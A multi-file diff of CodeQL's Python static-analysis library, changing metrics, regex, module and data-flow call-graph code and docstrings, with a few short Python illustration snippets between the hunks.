* Gets the cyclomatic complexity of the function:
* The number of linearly independent paths through the source code.
* Computed as E - N + 2P,
* where
@@ -27,9 +27,9 @@ class FunctionMetrics extends Function {
* P = the number of connected components, which for a single function is 1.
*/
int getCyclomaticComplexity() {
exists(int E, int N |
N = count(BasicBlock b | b = this.getABasicBlock() and b.likelyReachable()) and
E =
exists(int e, int n |
n = count(BasicBlock b | b = this.getABasicBlock() and b.likelyReachable()) and
e =
count(BasicBlock b1, BasicBlock b2 |
b1 = this.getABasicBlock() and
b1.likelyReachable() and
@@ -39,7 +39,7 @@ class FunctionMetrics extends Function {
not b1.unlikelySuccessor(b2)
)
|
result = E - N + 2
result = e - n + 2
)
}
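For intuition, a tiny function and its hand-counted complexity under the E - N + 2 formula (a rough sketch, ignoring the reachability filtering above):
```python
def classify(x):
    # Two decision points give cyclomatic complexity 3.
    if x < 0:
        return "negative"
    elif x == 0:
        return "zero"
    return "positive"
```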
@@ -130,13 +130,13 @@ class ClassMetrics extends Class {
}
/**
* The afferent coupling of a class is the number of classes that
* Gets the afferent coupling of a class -- the number of classes that
* directly depend on it.
*/
int getAfferentCoupling() { result = count(ClassMetrics t | t.dependsOn(this)) }
/**
* The efferent coupling of a class is the number of classes that
* Gets the efferent coupling of a class -- the number of classes that
* it directly depends on.
*/
int getEfferentCoupling() { result = count(ClassMetrics t | this.dependsOn(t)) }
@@ -273,13 +273,13 @@ class ModuleMetrics extends Module {
int getNumberOfLinesOfDocStrings() { py_docstringlines(this, result) }
/**
* The afferent coupling of a class is the number of classes that
* Gets the afferent coupling of a module -- the number of modules that
* directly depend on it.
*/
int getAfferentCoupling() { result = count(ModuleMetrics t | t.dependsOn(this)) }
/**
* The efferent coupling of a class is the number of classes that
* Gets the efferent coupling of a module -- the number of modules that
* it directly depends on.
*/
int getEfferentCoupling() { result = count(ModuleMetrics t | this.dependsOn(t)) }

View File

@@ -1,6 +1,6 @@
import python
private import semmle.python.objects.ObjectAPI
private import semmle.python.objects.Modules
private import semmle.python.internal.CachedStages
/**
* A module. This is the top level element in an AST, corresponding to a source file.
@@ -22,12 +22,13 @@ class Module extends Module_, Scope, AstNode {
}
/**
* Gets the enclosing scope of this module (always none).
*
* This method will be deprecated in the next release. Please use `getEnclosingScope()` instead.
* The enclosing scope of this module (always none)
*/
override Scope getScope() { none() }
/** The enclosing scope of this module (always none) */
/** Gets the enclosing scope of this module (always none) */
override Scope getEnclosingScope() { none() }
/** Gets the statements forming the body of this module */
@@ -98,12 +99,6 @@ class Module extends Module_, Scope, AstNode {
/** Gets the metrics for this module */
ModuleMetrics getMetrics() { result = this }
/**
* Use ModuleObject.getAnImportedModule() instead.
* Gets a module imported by this module
*/
deprecated Module getAnImportedModule() { result.getName() = this.getAnImportedModuleName() }
string getAnImportedModuleName() {
exists(Import i | i.getEnclosingModule() = this | result = i.getAnImportedModuleName())
or
@@ -196,7 +191,7 @@ private predicate isPotentialSourcePackage(Folder f) {
private predicate isPotentialPackage(Folder f) {
exists(f.getFile("__init__.py"))
or
py_flags_versioned("options.respect_init", "False", _) and major_version() = 2
py_flags_versioned("options.respect_init", "False", _) and major_version() = 2 and exists(f)
}
private string moduleNameFromBase(Container file) {
@@ -226,7 +221,9 @@ private predicate transitively_imported_from_entry_point(File file) {
)
}
cached
string moduleNameFromFile(Container file) {
Stages::AST::ref() and
exists(string basename |
basename = moduleNameFromBase(file) and
legalShortName(basename)

View File

@@ -1,6 +1,6 @@
import python
/** Base class for operators */
/** The base class for operators */
class Operator extends Operator_ {
/** Gets the name of the special method used to implement this operator */
string getSpecialMethodName() { none() }
@@ -131,7 +131,7 @@ class Compare extends Compare_ {
}
}
/** List of comparison operators in a comparison */
/** A list of comparison operators in a comparison */
class CmpopList extends CmpopList_ { }
/** A comparison operator */

View File

@@ -10,6 +10,7 @@ class Pattern extends Pattern_, AstNode {
override Scope getScope() { result = this.getCase().getScope() }
/** Gets the case statement containing this pattern */
pragma[nomagic]
Case getCase() { result.contains(this) }
override string toString() { result = "Pattern" }

View File

@@ -39,7 +39,12 @@ newtype TRegExpParent =
/** A special character */
TRegExpSpecialChar(Regex re, int start, int end) { re.specialCharacter(start, end, _) } or
/** A normal character */
TRegExpNormalChar(Regex re, int start, int end) { re.normalCharacter(start, end) } or
TRegExpNormalChar(Regex re, int start, int end) {
re.normalCharacterSequence(start, end)
or
re.escapedCharacter(start, end) and
not re.specialCharacter(start, end, _)
} or
/** A back reference */
TRegExpBackRef(Regex re, int start, int end) { re.backreference(start, end) }
@@ -440,6 +445,8 @@ class RegExpAlt extends RegExpTerm, TRegExpAlt {
override string getPrimaryQLClass() { result = "RegExpAlt" }
}
class RegExpCharEscape = RegExpEscape;
/**
* An escaped regular expression term, that is, a regular expression
* term starting with a backslash, which is not a backreference.
@@ -545,7 +552,7 @@ class RegExpWordBoundary extends RegExpSpecialChar {
/**
* A character class escape in a regular expression.
* That is, an escaped charachter that denotes multiple characters.
* That is, an escaped character that denotes multiple characters.
*
* Examples:
*
@@ -746,6 +753,9 @@ class RegExpGroup extends RegExpTerm, TRegExpGroup {
*/
int getNumber() { result = re.getGroupNumber(start, end) }
/** Holds if this is a capture group. */
predicate isCapture() { exists(this.getNumber()) }
/** Holds if this is a named capture group. */
predicate isNamed() { exists(this.getName()) }

View File

@@ -9,11 +9,12 @@ class Scope extends Scope_ {
Module getEnclosingModule() { result = this.getEnclosingScope().getEnclosingModule() }
/**
* Gets the scope enclosing this scope (modules have no enclosing scope).
*
* This method will be deprecated in the next release. Please use `getEnclosingScope()` instead.
* The reason for this is to avoid confusion around use of `x.getScope+()` where `x` might be an
* `AstNode` or a `Variable`. Forcing the users to write `x.getScope().getEnclosingScope*()` ensures that
* the apparent semantics and the actual semantics coincide.
* [ Gets the scope enclosing this scope (modules have no enclosing scope) ]
*/
Scope getScope() { none() }

View File

@@ -31,7 +31,7 @@ private predicate self_attribute(Attribute attr, Class cls) {
)
}
/** Helper class for UndefinedClassAttribute.ql & MaybeUndefinedClassAttribute.ql */
/** A helper class for UndefinedClassAttribute.ql & MaybeUndefinedClassAttribute.ql */
class SelfAttributeRead extends SelfAttribute {
SelfAttributeRead() {
this.getCtx() instanceof Load and

View File

@@ -8,7 +8,7 @@
* Extend `SpecialMethod::Potential` to capture more cases.
*/
import python
private import python
/** A control flow node which might correspond to a special method call. */
class PotentialSpecialMethodCallNode extends ControlFlowNode {
@@ -112,6 +112,6 @@ class SpecialMethodCallNode extends PotentialSpecialMethodCallNode {
)
}
/** The method that is called. */
/** Gets the method that is called. */
Value getResolvedSpecialMethod() { result = resolvedSpecialMethod }
}

View File

@@ -323,7 +323,7 @@ class Raise extends Raise_ {
override Expr getASubExpression() { py_exprs(result, _, this, _) }
/**
* The expression immediately following the `raise`, this is the
* Gets the expression immediately following the `raise`. This is the
* exception raised, but not accounting for tuples in Python 2.
*/
Expr getException() {
@@ -332,7 +332,7 @@ class Raise extends Raise_ {
result = this.getExc()
}
/** The exception raised, accounting for tuples in Python 2. */
/** Gets the exception raised, accounting for tuples in Python 2. */
Expr getRaised() {
exists(Expr raw | raw = this.getException() |
if not major_version() = 2 or not exists(raw.(Tuple).getAnElt())

View File

@@ -0,0 +1,41 @@
/**
* Provides classes for working with regular expressions.
*/
private import semmle.python.RegexTreeView
private import semmle.python.regex
private import semmle.python.dataflow.new.DataFlow
/**
* Provides utility predicates related to regular expressions.
*/
module RegExpPatterns {
/**
* Gets a pattern that matches common top-level domain names in lower case.
*/
string getACommonTld() {
// according to ranking by http://google.com/search?q=site:.<<TLD>>
result = "(?:com|org|edu|gov|uk|net|io)(?![a-z0-9])"
}
}
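A usage sketch of the pattern above; the negative lookahead keeps ".community" from matching as ".com":
```python
import re

TLD = r"(?:com|org|edu|gov|uk|net|io)(?![a-z0-9])"

assert re.search(r"\." + TLD, "https://example.com/path")
assert not re.search(r"\." + TLD, "https://example.community/path")
```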
/**
* A node whose value may flow to a position where it is interpreted
* as a part of a regular expression.
*/
class RegExpPatternSource extends DataFlow::CfgNode {
private Regex astNode;
RegExpPatternSource() { astNode = this.asExpr() }
/**
* Gets a node where the pattern of this node is parsed as a part of
* a regular expression.
*/
DataFlow::Node getAParse() { result = this }
/**
* Gets the root term of the regular expression parsed from this pattern.
*/
RegExpTerm getRegExpTerm() { result.getRegex() = astNode }
}

View File

@@ -227,7 +227,7 @@ private module SensitiveDataModeling {
}
/**
* Any kind of variable assignment (also including with/for) where the name indicates
* A variable assignment (also including with/for) where the name indicates
* it contains sensitive data.
*
* Note: We _could_ make any access to a variable with a sensitive name a source of

View File

@@ -6,14 +6,14 @@
private import python
private import internal.TypeTracker as Internal
/** Any string that may appear as the name of an attribute or access path. */
/** A string that may appear as the name of an attribute or access path. */
class AttributeName = Internal::ContentName;
/** Either an attribute name, or the empty string (representing no attribute). */
/** An attribute name, or the empty string (representing no attribute). */
class OptionalAttributeName = Internal::OptionalContentName;
/**
* Summary of the steps needed to track a value to a given dataflow node.
* The summary of the steps needed to track a value to a given dataflow node.
*
* This can be used to track objects that implement a certain API in order to
* recognize calls to that API. Note that type-tracking does not by itself provide a

View File

@@ -92,6 +92,32 @@ private class AttributeAssignmentAsAttrWrite extends AttrWrite, CfgNode {
override string getAttributeName() { result = node.getName() }
}
/**
* An attribute assignment where the object is a global variable: `global_var.attr = value`.
*
* Syntactically, this is identical to the situation that is covered by
* `AttributeAssignmentAsAttrWrite`, however in this case we want to behave as if the object that is
* being written is the underlying `ModuleVariableNode`.
*/
private class GlobalAttributeAssignmentAsAttrWrite extends AttrWrite, CfgNode {
override AttributeAssignmentNode node;
override Node getValue() { result.asCfgNode() = node.getValue() }
override Node getObject() {
result.(ModuleVariableNode).getVariable() = node.getObject().getNode().(Name).getVariable()
}
override ExprNode getAttributeNameExpr() {
// Attribute names don't exist as `Node`s in the control flow graph, as they can only ever be
// identifiers, and are therefore represented directly as strings.
// Use `getAttributeName` to access the name of the attribute.
none()
}
override string getAttributeName() { result = node.getName() }
}
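The Python shape this class is about, sketched with hypothetical names:
```python
class Settings:
    pass

settings = Settings()  # a module-level ("global") variable

def enable_debug():
    # The object of this attribute write is the global `settings` variable; the
    # model treats the write as targeting the module-level variable itself.
    settings.debug = True
```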
/** Represents `CallNode`s that may refer to calls to built-in functions or classes. */
private class BuiltInCallNode extends CallNode {
string name;
@@ -204,6 +230,8 @@ abstract class AttrRead extends AttrRef, Node, LocalSourceNode { }
private class AttributeReadAsAttrRead extends AttrRead, CfgNode {
override AttrNode node;
AttributeReadAsAttrRead() { node.isLoad() }
override Node getObject() { result.asCfgNode() = node.getObject() }
override ExprNode getAttributeNameExpr() {

View File

@@ -0,0 +1,558 @@
/**
* INTERNAL: Do not use.
*
* Points-to based call-graph.
*/
private import python
private import DataFlowPublic
private import semmle.python.SpecialMethods
/** A parameter position represented by an integer. */
class ParameterPosition extends int {
ParameterPosition() { exists(any(DataFlowCallable c).getParameter(this)) }
}
/** An argument position represented by an integer. */
class ArgumentPosition extends int {
ArgumentPosition() { exists(any(DataFlowCall c).getArg(this)) }
}
/** Holds if arguments at position `apos` match parameters at position `ppos`. */
pragma[inline]
predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos }
/**
* Computes routing of arguments to parameters
*
* When a call contains more positional arguments than there are positional parameters,
* the extra positional arguments are passed as a tuple to a starred parameter. This is
* achieved by synthesizing a node `TPosOverflowNode(call, callable)`
* that represents the tuple of extra positional arguments. There is a store step from each
* extra positional argument to this node.
*
* CURRENTLY NOT SUPPORTED:
* When a call contains an iterable unpacking argument, such as `func(*args)`, it is expanded into positional arguments.
*
* CURRENTLY NOT SUPPORTED:
* If a call contains an iterable unpacking argument, such as `func(*args)`, and the callee contains a starred argument, any extra
* positional arguments are passed to the starred argument.
*
* When a call contains keyword arguments that do not correspond to keyword parameters, these
* extra keyword arguments are passed as a dictionary to a doubly starred parameter. This is
* achieved by synthesizing a node `TKwOverflowNode(call, callable)`
* that represents the dictionary of extra keyword arguments. There is a store step from each
* extra keyword argument to this node.
*
* When a call contains a dictionary unpacking argument, such as `func(**kwargs)`, with entries corresponding to a keyword parameter,
* the value at such a key is unpacked and passed to the parameter. This is achieved
* by synthesizing an argument node `TKwUnpacked(call, callable, name)` representing the unpacked
* value. This node is used as the argument passed to the matching keyword parameter. There is a read
* step from the dictionary argument to the synthesized argument node.
*
* When a call contains a dictionary unpacking argument, such as `func(**kwargs)`, and the callee contains a doubly starred parameter,
* entries which are not unpacked are passed to the doubly starred parameter. This is achieved by
* adding a dataflow step from the dictionary argument to `TKwOverflowNode(call, callable)` and a
* step to clear content of that node at any unpacked keys.
*
* ## Examples:
* Assume that we have the callable
* ```python
* def f(x, y, *t, **d):
* pass
* ```
* Then the call
* ```python
* f(0, 1, 2, a=3)
* ```
* will be modeled as
* ```python
* f(0, 1, [*t], [**d])
* ```
* where `[` and `]` denote synthesized nodes, so `[*t]` is the synthesized tuple argument
* `TPosOverflowNode` and `[**d]` is the synthesized dictionary argument `TKwOverflowNode`.
* There will be a store step from `2` to `[*t]` at pos `0` and one from `3` to `[**d]` at key
* `a`.
*
* For the call
* ```python
* f(0, **{"y": 1, "a": 3})
* ```
* no tuple argument is synthesized. It is modeled as
* ```python
* f(0, [y=1], [**d])
* ```
* where `[y=1]` is the synthesized unpacked argument `TKwUnpacked` (with `name` = `y`). There is
* a read step from `**{"y": 1, "a": 3}` to `[y=1]` at key `y` to get the value passed to the parameter
* `y`. There is a dataflow step from `**{"y": 1, "a": 3}` to `[**d]` to transfer the content and
* a clearing of content at key `y` for node `[**d]`, since that value has been unpacked.
*/
module ArgumentPassing {
/**
* Holds if `call` represents a `DataFlowCall` to a `DataFlowCallable` represented by `callable`.
*
* It _may not_ be the case that `call = callable.getACall()`, for example when `call` represents a `ClassCall`.
*
* Used to limit the size of predicates.
*/
predicate connects(CallNode call, CallableValue callable) {
exists(DataFlowCall c |
call = c.getNode() and
callable = c.getCallable().getCallableValue()
)
}
/**
* Gets the `n`th parameter of `callable`.
* If the callable has a starred parameter, say `*tuple`, that is matched with `n=-1`.
* If the callable has a doubly starred parameter, say `**dict`, that is matched with `n=-2`.
* Note that, unlike other languages, we do _not_ use -1 for the position of `self` in Python,
* as it is an explicit parameter at position 0.
*/
NameNode getParameter(CallableValue callable, int n) {
// positional parameter
result = callable.getParameter(n)
or
// starred parameter, `*tuple`
exists(Function f |
f = callable.getScope() and
n = -1 and
result = f.getVararg().getAFlowNode()
)
or
// doubly starred parameter, `**dict`
exists(Function f |
f = callable.getScope() and
n = -2 and
result = f.getKwarg().getAFlowNode()
)
}
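A short runnable Python sketch (hypothetical function name) of the parameter positions used above: ordinary parameters get their zero-based index, the starred parameter is addressed as -1, and the doubly starred parameter as -2.

```python
def g(a, b, *rest, **extra):
    # positions as used by `getParameter`: a -> 0, b -> 1, *rest -> -1, **extra -> -2
    return a, b, rest, extra


print(g(1, 2, 3, 4, key="value"))  # (1, 2, (3, 4), {'key': 'value'})
```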
/**
* A type representing a mapping from argument indices to parameter indices.
* We currently use two mappings: `NoShift`, the identity, which is used for ordinary
* function calls, and `ShiftOneUp`, which is used for calls where an extra argument
* is inserted. These include method calls, constructor calls, and class calls.
* In these calls, the argument at index `n` is mapped to the parameter at position `n+1`.
*/
newtype TArgParamMapping =
TNoShift() or
TShiftOneUp()
/** A mapping used for parameter passing. */
abstract class ArgParamMapping extends TArgParamMapping {
/** Gets the index of the parameter that corresponds to the argument at index `argN`. */
bindingset[argN]
abstract int getParamN(int argN);
/** Gets a textual representation of this element. */
abstract string toString();
}
/** A mapping that passes argument `n` to parameter `n`. */
class NoShift extends ArgParamMapping, TNoShift {
NoShift() { this = TNoShift() }
override string toString() { result = "NoShift [n -> n]" }
bindingset[argN]
override int getParamN(int argN) { result = argN }
}
/** A mapping that passes argument `n` to parameter `n+1`. */
class ShiftOneUp extends ArgParamMapping, TShiftOneUp {
ShiftOneUp() { this = TShiftOneUp() }
override string toString() { result = "ShiftOneUp [n -> n+1]" }
bindingset[argN]
override int getParamN(int argN) { result = argN + 1 }
}
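To see why the shifted mapping is needed, consider this runnable Python sketch (hypothetical class): in a bound method call the receiver occupies parameter position 0, so the first positional argument at the call site lands at parameter position 1.

```python
class Counter:
    def add(self, amount):  # parameter positions: self -> 0, amount -> 1
        return amount


c = Counter()
c.add(42)  # 42 sits at argument position 0 but is passed to parameter position 1
```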
/**
* Gets the node representing the argument to `call` that is passed to the parameter at
* (zero-based) index `paramN` in `callable`. If this is a positional argument, it must appear
* at an index, `argN`, in `call` which satisfies `paramN = mapping.getParamN(argN)`.
*
* `mapping` will be the identity for function calls, but not for method- or constructor calls,
* where the first parameter is `self` and the first positional argument is passed to the second positional parameter.
* Similarly for classmethod calls, where the first parameter is `cls`.
*
* NOT SUPPORTED: Keyword-only parameters.
*/
Node getArg(CallNode call, ArgParamMapping mapping, CallableValue callable, int paramN) {
connects(call, callable) and
(
// positional argument
exists(int argN |
paramN = mapping.getParamN(argN) and
result = TCfgNode(call.getArg(argN))
)
or
// keyword argument
// TODO: Since `getArgName` has no results for keyword-only parameters,
// these are currently not supported.
exists(Function f, string argName |
f = callable.getScope() and
f.getArgName(paramN) = argName and
result = TCfgNode(call.getArgByName(unbind_string(argName)))
)
or
// a synthesized argument passed to the starred parameter (at position -1)
callable.getScope().hasVarArg() and
paramN = -1 and
result = TPosOverflowNode(call, callable)
or
// a synthesized argument passed to the doubly starred parameter (at position -2)
callable.getScope().hasKwArg() and
paramN = -2 and
result = TKwOverflowNode(call, callable)
or
// argument unpacked from dict
exists(string name |
call_unpacks(call, mapping, callable, name, paramN) and
result = TKwUnpackedNode(call, callable, name)
)
)
}
/** Currently required in `getArg` in order to prevent a bad join. */
bindingset[result, s]
private string unbind_string(string s) { result <= s and s <= result }
/** Gets the control flow node that is passed as the `n`th overflow positional argument. */
ControlFlowNode getPositionalOverflowArg(CallNode call, CallableValue callable, int n) {
connects(call, callable) and
exists(Function f, int posCount, int argNr |
f = callable.getScope() and
f.hasVarArg() and
posCount = f.getPositionalParameterCount() and
result = call.getArg(argNr) and
argNr >= posCount and
argNr = posCount + n
)
}
/** Gets the control flow node that is passed as the overflow keyword argument with key `key`. */
ControlFlowNode getKeywordOverflowArg(CallNode call, CallableValue callable, string key) {
connects(call, callable) and
exists(Function f |
f = callable.getScope() and
f.hasKwArg() and
not exists(f.getArgByName(key)) and
result = call.getArgByName(key)
)
}
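The two overflow predicates above can be pictured with a runnable Python sketch (hypothetical names): positional arguments beyond the declared positional parameters end up in the starred parameter, and keyword arguments that match no parameter name end up in the doubly starred parameter.

```python
def f(x, y, *t, **d):
    return x, y, t, d


# 2 and 3 are the overflow positional arguments (overflow indices 0 and 1),
# and a=4 is an overflow keyword argument with key "a".
print(f(0, 1, 2, 3, a=4))  # (0, 1, (2, 3), {'a': 4})
```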
/**
* Holds if `call` unpacks a dictionary argument in order to pass it via `name`.
* It will then be passed to the parameter of `callable` at index `paramN`.
*/
predicate call_unpacks(
CallNode call, ArgParamMapping mapping, CallableValue callable, string name, int paramN
) {
connects(call, callable) and
exists(Function f |
f = callable.getScope() and
not exists(int argN | paramN = mapping.getParamN(argN) | exists(call.getArg(argN))) and // no positional argument available
name = f.getArgName(paramN) and
// not exists(call.getArgByName(name)) and // only matches keyword arguments not preceded by **
// TODO: make the below logic respect control flow splitting (by not going to the AST).
not call.getNode().getANamedArg().(Keyword).getArg() = name and // no keyword argument available
paramN >= 0 and
paramN < f.getPositionalParameterCount() + f.getKeywordOnlyParameterCount() and
exists(call.getNode().getKwargs()) // dict argument available
)
}
}
import ArgumentPassing
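For the dictionary-unpacking case handled by `call_unpacks`, here is a runnable Python sketch (it reuses the `f` from the documentation above; everything else is hypothetical): the entry whose key matches a keyword parameter is unpacked and passed to that parameter, while the remaining entries are left for the doubly starred parameter.

```python
def f(x, y, *t, **d):
    return x, y, t, d


kwargs = {"y": 1, "a": 3}
# "y" matches the keyword parameter y and is unpacked into it; "a" matches no
# parameter and is therefore passed on to the doubly starred parameter d.
print(f(0, **kwargs))  # (0, 1, (), {'a': 3})
```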
/**
* IPA type for DataFlowCallable.
*
* A callable is either a function value, a class value, or a module (for enclosing `ModuleVariableNode`s).
* A module has no calls.
*/
newtype TDataFlowCallable =
TCallableValue(CallableValue callable) {
callable instanceof FunctionValue and
not callable.(FunctionValue).isLambda()
or
callable instanceof ClassValue
} or
TLambda(Function lambda) { lambda.isLambda() } or
TModule(Module m)
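A hedged Python-level picture of the three callable kinds distinguished here (all names hypothetical): a plain function, a class whose call runs `__init__`, and module-level code, which only serves as the scope for module variables and has no calls of its own.

```python
def greet(name):  # a function value
    return "hello " + name


class Greeter:  # a class value; calling it runs __init__
    def __init__(self, name):
        self.name = name


GREETING = greet("world")  # module-level code: the enclosing scope of this global
                           # is the module itself, which is never called
```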
/** A callable. */
abstract class DataFlowCallable extends TDataFlowCallable {
/** Gets a textual representation of this element. */
abstract string toString();
/** Gets a call to this callable. */
abstract CallNode getACall();
/** Gets the scope of this callable. */
abstract Scope getScope();
/** Gets the `n`th parameter of this callable. */
abstract NameNode getParameter(int n);
/** Gets the name of this callable. */
abstract string getName();
/** Gets a callable value for this callable, if one exists. */
abstract CallableValue getCallableValue();
}
/** A class representing a callable value. */
class DataFlowCallableValue extends DataFlowCallable, TCallableValue {
CallableValue callable;
DataFlowCallableValue() { this = TCallableValue(callable) }
override string toString() { result = callable.toString() }
override CallNode getACall() { result = callable.getACall() }
override Scope getScope() { result = callable.getScope() }
override NameNode getParameter(int n) { result = getParameter(callable, n) }
override string getName() { result = callable.getName() }
override CallableValue getCallableValue() { result = callable }
}
/** A class representing a callable lambda. */
class DataFlowLambda extends DataFlowCallable, TLambda {
Function lambda;
DataFlowLambda() { this = TLambda(lambda) }
override string toString() { result = lambda.toString() }
override CallNode getACall() { result = this.getCallableValue().getACall() }
override Scope getScope() { result = lambda.getEvaluatingScope() }
override NameNode getParameter(int n) { result = getParameter(this.getCallableValue(), n) }
override string getName() { result = "Lambda callable" }
override FunctionValue getCallableValue() {
result.getOrigin().getNode() = lambda.getDefinition()
}
}
/** A class representing the scope in which a `ModuleVariableNode` appears. */
class DataFlowModuleScope extends DataFlowCallable, TModule {
Module mod;
DataFlowModuleScope() { this = TModule(mod) }
override string toString() { result = mod.toString() }
override CallNode getACall() { none() }
override Scope getScope() { result = mod }
override NameNode getParameter(int n) { none() }
override string getName() { result = mod.getName() }
override CallableValue getCallableValue() { none() }
}
/**
* IPA type for DataFlowCall.
*
* Calls corresponding to `CallNode`s are either to callable values or to classes.
* The latter are directed to the callable corresponding to the `__init__` method of the class.
*
* An `__init__` method can also be called directly, so the same callable can be targeted by
* different types of calls. In that case, the parameter mappings will be different,
* as the class call will synthesize an argument node to be mapped to the `self` parameter.
*
* A call corresponding to a special method call is handled by the corresponding `SpecialMethodCallNode`.
*
* TODO: Add `TClassMethodCall` mapping `cls` appropriately.
*/
newtype TDataFlowCall =
TFunctionCall(CallNode call) { call = any(FunctionValue f).getAFunctionCall() } or
/** Bound methods need to make room for the explicit `self` parameter. */
TMethodCall(CallNode call) { call = any(FunctionValue f).getAMethodCall() } or
TClassCall(CallNode call) { call = any(ClassValue c | not c.isAbsent()).getACall() } or
TSpecialCall(SpecialMethodCallNode special)
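The remark about `__init__` being reachable both through the class and directly can be made concrete with a runnable sketch (hypothetical class): the two call styles pass the instance in different positions, which is why the argument-to-parameter mappings differ.

```python
class Box:
    def __init__(self, value):
        self.value = value


b1 = Box(3)          # class call: the instance bound to `self` is created implicitly
b2 = Box.__new__(Box)
Box.__init__(b2, 3)  # direct call: the instance is an explicit first argument
```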
/** A call. */
abstract class DataFlowCall extends TDataFlowCall {
/** Gets a textual representation of this element. */
abstract string toString();
/** Gets the callable to which this call goes. */
abstract DataFlowCallable getCallable();
/**
* Gets the argument to this call that will be sent
* to the `n`th parameter of the callable.
*/
abstract Node getArg(int n);
/** Gets the control flow node representing this call. */
abstract ControlFlowNode getNode();
/** Gets the enclosing callable of this call. */
abstract DataFlowCallable getEnclosingCallable();
/** Gets the location of this dataflow call. */
Location getLocation() { result = this.getNode().getLocation() }
}
/**
* A call to a function/lambda.
* This excludes calls to bound methods, classes, and special methods.
* Bound method calls and class calls insert an argument for the explicit
* `self` parameter, and special method calls have special argument passing.
*/
class FunctionCall extends DataFlowCall, TFunctionCall {
CallNode call;
DataFlowCallable callable;
FunctionCall() {
this = TFunctionCall(call) and
call = callable.getACall()
}
override string toString() { result = call.toString() }
override Node getArg(int n) { result = getArg(call, TNoShift(), callable.getCallableValue(), n) }
override ControlFlowNode getNode() { result = call }
override DataFlowCallable getCallable() { result = callable }
override DataFlowCallable getEnclosingCallable() { result.getScope() = call.getNode().getScope() }
}
/**
* Represents a call to a bound method.
* The node representing the instance is inserted as argument to the `self` parameter.
*/
class MethodCall extends DataFlowCall, TMethodCall {
CallNode call;
FunctionValue bm;
MethodCall() {
this = TMethodCall(call) and
call = bm.getACall()
}
private CallableValue getCallableValue() { result = bm }
override string toString() { result = call.toString() }
override Node getArg(int n) {
n > 0 and result = getArg(call, TShiftOneUp(), this.getCallableValue(), n)
or
n = 0 and result = TCfgNode(call.getFunction().(AttrNode).getObject())
}
override ControlFlowNode getNode() { result = call }
override DataFlowCallable getCallable() { result = TCallableValue(this.getCallableValue()) }
override DataFlowCallable getEnclosingCallable() { result.getScope() = call.getScope() }
}
/**
* Represents a call to a class.
* The pre-update node for the call is inserted as argument to the `self` parameter.
* That makes the call node the post-update node holding the value of the object
* after the constructor has run.
*/
class ClassCall extends DataFlowCall, TClassCall {
CallNode call;
ClassValue c;
ClassCall() {
this = TClassCall(call) and
call = c.getACall()
}
private CallableValue getCallableValue() { c.getScope().getInitMethod() = result.getScope() }
override string toString() { result = call.toString() }
override Node getArg(int n) {
n > 0 and result = getArg(call, TShiftOneUp(), this.getCallableValue(), n)
or
n = 0 and result = TSyntheticPreUpdateNode(TCfgNode(call))
}
override ControlFlowNode getNode() { result = call }
override DataFlowCallable getCallable() { result = TCallableValue(this.getCallableValue()) }
override DataFlowCallable getEnclosingCallable() { result.getScope() = call.getScope() }
}
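A minimal runnable sketch (hypothetical class) of the pre-/post-update view described above: before the constructor runs the object is blank, and the value of the call expression is the object after `__init__` has updated it.

```python
class Point:
    def __init__(self, x):
        # `self` is the freshly created (pre-update) object ...
        self.x = x


p = Point(3)  # ... and the call expression yields the post-update object, with x set
print(p.x)    # 3
```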
/** A call to a special method. */
class SpecialCall extends DataFlowCall, TSpecialCall {
SpecialMethodCallNode special;
SpecialCall() { this = TSpecialCall(special) }
override string toString() { result = special.toString() }
override Node getArg(int n) { result = TCfgNode(special.(SpecialMethod::Potential).getArg(n)) }
override ControlFlowNode getNode() { result = special }
override DataFlowCallable getCallable() {
result = TCallableValue(special.getResolvedSpecialMethod())
}
override DataFlowCallable getEnclosingCallable() {
result.getScope() = special.getNode().getScope()
}
}
/** Gets a viable run-time target for the call `call`. */
DataFlowCallable viableCallable(DataFlowCall call) { result = call.getCallable() }
private newtype TReturnKind = TNormalReturnKind()
/**
* A return kind. A return kind describes how a value can be returned
* from a callable. For Python, this is simply a method return.
*/
class ReturnKind extends TReturnKind {
/** Gets a textual representation of this element. */
string toString() { result = "return" }
}
/** A data flow node that represents a value returned by a callable. */
class ReturnNode extends CfgNode {
Return ret;
// See `TaintTrackingImplementation::returnFlowStep`
ReturnNode() { node = ret.getValue().getAFlowNode() }
/** Gets the kind of this return node. */
ReturnKind getKind() { any() }
}
/** A data flow node that represents the output of a call. */
class OutNode extends CfgNode {
OutNode() { node instanceof CallNode }
}
/**
* Gets a node that can read the value returned from `call` with return kind
* `kind`.
*/
OutNode getAnOutNode(DataFlowCall call, ReturnKind kind) {
call.getNode() = result.getNode() and
kind = TNormalReturnKind()
}
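A small runnable sketch (hypothetical names) of the return/out pairing: the value of the `return` expression corresponds to a return node, and the call expression that receives it corresponds to the out node.

```python
def produce():
    data = "payload"
    return data  # the returned expression is the return node


result = produce()  # the call expression is the out node reading that value
print(result)
```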

View File

@@ -94,15 +94,19 @@ abstract class Configuration extends string {
predicate isBarrierGuard(BarrierGuard guard) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis.
* Holds if data flow through nodes guarded by `guard` is prohibited when
* the flow state is `state`
*/
predicate isBarrierGuard(BarrierGuard guard, FlowState state) { none() }
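Conceptually, a barrier guard corresponds to a validating check in the analyzed program; the following is a hedged, runnable Python sketch of the pattern (all names hypothetical).

```python
def is_safe(value):  # hypothetical validation acting as the barrier guard
    return "<" not in value


def sink(value):  # hypothetical sensitive operation
    print(value)


def handle(value):
    if is_safe(value):
        sink(value)  # flow into this guarded use is cut off by the barrier guard


handle("hello")
```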
/**
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
*/
predicate isAdditionalFlowStep(Node node1, Node node2) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis. This step is only applicable in `state1` and
* updates the flow state to `state2`.
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalFlowStep(Node node1, FlowState state1, Node node2, FlowState state2) {
none()
@@ -112,7 +116,7 @@ abstract class Configuration extends string {
* Holds if an arbitrary number of implicit read steps of content `c` may be
* taken at `node`.
*/
predicate allowImplicitRead(Node node, Content c) { none() }
predicate allowImplicitRead(Node node, ContentSet c) { none() }
/**
* Gets the virtual dispatch branching limit when calculating field flow.
@@ -166,6 +170,14 @@ abstract class Configuration extends string {
*/
int explorationLimit() { none() }
/**
* Holds if hidden nodes should be included in the data flow graph.
*
* This feature should only be used for debugging or when the data flow graph
* is not visualized (for example in a `path-problem` query).
*/
predicate includeHiddenNodes() { none() }
